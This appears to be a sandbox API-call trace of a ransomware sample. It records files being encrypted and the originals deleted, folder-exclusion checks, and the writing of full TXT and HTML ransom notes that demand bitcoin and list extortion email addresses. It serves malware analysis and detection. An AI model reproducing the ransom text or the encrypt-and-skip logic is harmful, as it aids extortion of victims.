	[0174.475] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.475] CryptHashData (hHash=0xfb94b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0174.475] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.475] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb94b0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb93f0) returned 1
	[0174.475] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.476] CryptEncrypt (in: hKey=0xfb93f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x15c, dwBufLen=0x15c | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x160) returned 1
	[0174.476] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.476] RtlMoveMemory (in: Destination=0xfdc770, Source=0xfdcd58, Length=0x15c | out: Destination=0xfdc770) 
	[0174.476] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.476] CryptEncrypt (in: hKey=0xfb93f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc770*, pdwDataLen=0x1894dc*=0x15c, dwBufLen=0x160 | out: pbData=0xfdc770*, pdwDataLen=0x1894dc*=0x160) returned 1
	[0174.477] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.477] CryptDestroyKey (hKey=0xfb93f0) returned 1
	[0174.477] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.477] CryptDestroyHash (hHash=0xfb94b0) returned 1
	[0174.477] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.478] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0174.478] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.478] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0174.479] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.479] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0174.480] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 139
	[0174.481] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0174.482] WriteFile (in: hFile=0x3a0, lpBuffer=0xfdc770*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfdc770*, lpNumberOfBytesWritten=0x189938*=0x160, lpOverlapped=0x0) returned 1
	[0174.485] CloseHandle (hObject=0x3a0) returned 1
	[0174.485] CloseHandle (hObject=0x39c) returned 1
	[0174.485] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml")) returned 1
	[0174.489] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml")) returned 0
	[0174.490] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0d08f31, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0d08f31, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0d2f19c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName="RunTime.xml", cAlternateFileName="")) returned 0
	[0174.490] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0174.490] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0174.490] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov"
	[0174.491] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*.*"
	[0174.491] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.491] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.491] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT") returned 113
	[0174.491] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0174.492] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0174.492] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0174.496] CloseHandle (hObject=0x390) returned 1
	[0174.496] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0174.497] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.497] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0174.498] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0174.498] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0174.498] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0174.499] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0174.499] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0174.499] CloseHandle (hObject=0x390) returned 1
	[0174.500] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.500] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.500] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0174.500] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML") returned 114
	[0174.500] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0174.506] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0174.506] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0174.516] CloseHandle (hObject=0x390) returned 1
	[0174.517] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.517] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0174.518] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.518] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0174.519] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0174.519] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0174.519] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0174.520] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0174.520] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0174.520] CloseHandle (hObject=0x390) returned 1
	[0174.521] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x8188325e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x818a95a4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0174.521] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*.*") returned 89
	[0174.521] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.521] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*") returned 0x59
	[0174.521] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.522] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0174.522] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.522] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0174.522] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.522] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0174.522] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.522] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0174.522] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.523] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0174.523] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.523] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0174.523] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.523] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0174.523] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.523] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0174.524] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.524] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0174.524] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.524] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0174.524] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.524] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0174.524] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.525] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0174.525] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.525] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0174.525] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.525] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0174.525] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.525] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0174.525] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.574] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0174.574] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.574] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0174.574] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.575] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0174.575] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.575] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0174.575] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0174.575] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0174.575] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x8188325e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x818a95a4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName="..", cAlternateFileName="")) returned 1
	[0174.575] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0174.576] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x818a95a4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x818a95a4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x818cf683, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0174.576] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8188325e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8188325e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x818a95a4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0174.576] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0174.576] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1
	[0174.576] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1
	[0174.576] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov"
	[0174.576] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\"
	[0174.576] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\", lpString2="RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime"
	[0174.576] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime"
	[0174.577] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\"
	[0174.577] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\"
